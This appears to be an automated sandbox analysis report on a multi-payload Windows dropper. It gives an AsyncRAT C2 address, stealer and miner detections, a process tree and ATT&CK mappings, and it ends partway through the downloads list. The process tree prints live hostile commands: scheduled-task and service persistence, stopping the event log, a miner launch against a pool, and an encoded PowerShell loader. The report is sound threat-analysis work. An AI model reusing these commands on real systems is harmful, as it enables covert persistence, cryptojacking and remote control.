Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

240409-kfglnaaf84 10

09-04-2024 08:32

240409-kffz5aea2y 10

09-04-2024 08:32

240409-kffpcsaf79 10

11-03-2024 08:03

240311-jxm94afe6y 10

10-03-2024 15:15

240310-snee9sfd3y 10

Analysis

  • max time kernel
    300s
  • max time network
    302s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-04-2024 08:32

General

  • Target

    FUCKER.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

asyncrat

Version

0.5.6B

C2

koradon.giize.com:6606

Mutex

vomsklihddikoeyxag

Attributes
  • delay

    5

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Lumma Stealer payload V2 1 IoCs
  • Detect Lumma Stealer payload V4 1 IoCs
  • Detect ZGRat V1 19 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V2 payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 37 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
    "C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4668
    • C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe"
      2⤵
      • Executes dropped EXE
      PID:3788
    • C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1080
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1396
        3⤵
        • Program crash
        PID:4748
    • C:\Users\Admin\AppData\Local\Temp\Files\funta.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\funta.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:2400
    • C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2540
      • C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
        C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4152
        • C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe
          "C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2984
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\SysWOW64\cmd.exe
            5⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:1920
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2736
    • C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3852
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp31C4.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:1728
        • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
          "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4520
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4840
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1888
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:4016
    • C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4568
    • C:\Users\Admin\AppData\Local\Temp\Files\installer.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2324
      • C:\Users\Admin\AppData\Local\Temp\is-AQB3U.tmp\installer.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-AQB3U.tmp\installer.tmp" /SL5="$60220,3121405,832512,C:\Users\Admin\AppData\Local\Temp\Files\installer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
          "C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 3.1.22
          4⤵
          • Executes dropped EXE
          PID:4824
        • C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
          "C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 5.0.13
          4⤵
          • Executes dropped EXE
          PID:5052
        • C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
          "C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 6.0.11
          4⤵
          • Executes dropped EXE
          PID:3572
        • C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe
          "C:\Users\Admin\AppData\Local\Temp\is-18ELE.tmp\netcorecheck_x64.exe" Microsoft.NETCore.App 7.0.0
          4⤵
          • Executes dropped EXE
          PID:4992
    • C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3164
    • C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2948
    • C:\Users\Admin\AppData\Local\Temp\Files\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\patch.exe"
      2⤵
      • Executes dropped EXE
      PID:3192
    • C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:1548
    • C:\Users\Admin\AppData\Local\Temp\Files\123p.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\123p.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2412
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2352
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4984
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3336
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4296
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe delete "OBGPQMHF"
        3⤵
        • Launches sc.exe
        PID:2316
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
        3⤵
        • Launches sc.exe
        PID:3816
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop eventlog
        3⤵
        • Launches sc.exe
        PID:2644
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe start "OBGPQMHF"
        3⤵
        • Launches sc.exe
        PID:1516
    • C:\Users\Admin\AppData\Local\Temp\Files\mk.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\mk.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2224
    • C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"
      2⤵
      • Executes dropped EXE
      PID:4216
      • C:\Windows\SysWOW64\wscript.exe
        "wscript.exe" "C:\Users\Admin\start.vbs"
        3⤵
          PID:2732
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
            4⤵
              PID:3120
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4504
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
                5⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1892
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  6⤵
                    PID:1980
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                      PID:3520
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      6⤵
                        PID:3196
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1680
                          7⤵
                          • Program crash
                          PID:3124
              • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
                2⤵
                • Executes dropped EXE
                PID:952
                • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2760
                  • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                    C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                    4⤵
                    • Executes dropped EXE
                    PID:1912
                    • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                      C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:3792
                      • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                        C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                        6⤵
                        • Executes dropped EXE
                        PID:1080
                        • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                          C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:2364
                          • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                            C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                            8⤵
                            • Executes dropped EXE
                            PID:888
                            • C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                              C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
                              9⤵
                              • Executes dropped EXE
                              PID:760
              • C:\Users\Admin\AppData\Local\Temp\Files\conan.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\conan.exe"
                2⤵
                • Executes dropped EXE
                PID:3060
              • C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4912
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  3⤵
                    PID:4860
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 784
                    3⤵
                    • Program crash
                    PID:4928
                • C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3132
                • C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1804
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1080 -ip 1080
                1⤵
                  PID:4136
                • C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
                  C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2184
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2316
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3844
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1624
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1748
                  • C:\Windows\system32\conhost.exe
                    C:\Windows\system32\conhost.exe
                    2⤵
                      PID:1844
                    • C:\Windows\system32\svchost.exe
                      svchost.exe
                      2⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1588
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3196 -ip 3196
                    1⤵
                      PID:1708
                    • C:\Users\Admin\AppData\Roaming\Eszop.exe
                      C:\Users\Admin\AppData\Roaming\Eszop.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2024
                    • C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
                      C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1620
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4912 -ip 4912
                      1⤵
                        PID:2156

                      Network

                      MITRE ATT&CK Matrix ATT&CK v13

                      Execution

                      Scripting

                      1
                      T1064

                      Scheduled Task/Job

                      1
                      T1053

                      Persistence

                      Create or Modify System Process

                      2
                      T1543

                      Windows Service

                      2
                      T1543.003

                      Scheduled Task/Job

                      1
                      T1053

                      Privilege Escalation

                      Create or Modify System Process

                      2
                      T1543

                      Windows Service

                      2
                      T1543.003

                      Scheduled Task/Job

                      1
                      T1053

                      Defense Evasion

                      Virtualization/Sandbox Evasion

                      2
                      T1497

                      Impair Defenses

                      1
                      T1562

                      Scripting

                      1
                      T1064

                      Subvert Trust Controls

                      1
                      T1553

                      Install Root Certificate

                      1
                      T1553.004

                      Modify Registry

                      1
                      T1112

                      Credential Access

                      Unsecured Credentials

                      3
                      T1552

                      Credentials In Files

                      3
                      T1552.001

                      Discovery

                      Query Registry

                      5
                      T1012

                      Virtualization/Sandbox Evasion

                      2
                      T1497

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Command and Control

                      Web Service

                      1
                      T1102

                      Impact

                      Service Stop

                      1
                      T1489

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\Files\123p.exe
                        Filesize

                        10.7MB

                        MD5

                        b091c4848287be6601d720997394d453

                        SHA1

                        9180e34175e1f4644d5fa63227d665b2be15c75b

                        SHA256

                        d0b06ca6ece3fef6671fa8acd3d560a9400891abcd10f5cedcfe7bd1e6050dfe

                        SHA512

                        a3b3663fd343389aee2cbf76f426401d436992b2b56cea3b60e9c2e385510fa874fa45b2ac75703074f0303934c4223eaee1983851374a2e753fd0302042cc5a

                      • C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe
                        Filesize

                        80KB

                        MD5

                        7fbe056c414472cc2fcc6362bb66d212

                        SHA1

                        0df63fe311154434f7d14aae2f29f47a6222b053

                        SHA256

                        aa1b0b2f6f06f622abf2128ecafed1929682221c5ff4dd2426f16b9ae272fdf9

                        SHA512

                        38edc08d3fd41c818ae9457e200ade74ac22aabc678adce6a99d4789b621e43b298ca8e4189be4e997f66559325d76ad941d604d4375175f174de8521e779220

                      • C:\Users\Admin\AppData\Local\Temp\Files\Ama2.exe
                        Filesize

                        3.1MB

                        MD5

                        b9c3c735a3d1eae297ca362bee3393ef

                        SHA1

                        4011c6ad06cf1be487e9f1bf293a278e480920fa

                        SHA256

                        5edf686e646728c40a9107c1fabd527e5c6c2bf1ac6ec7326fe77fcb19e35ab7

                        SHA512

                        400704f676245bb30cde6f524c88f5f040e6a60562c4de41cca5588a851679d852d42baa8abddd1d250ada1544185489066bc0613e1749a95263033a338b69fa

                      • C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe
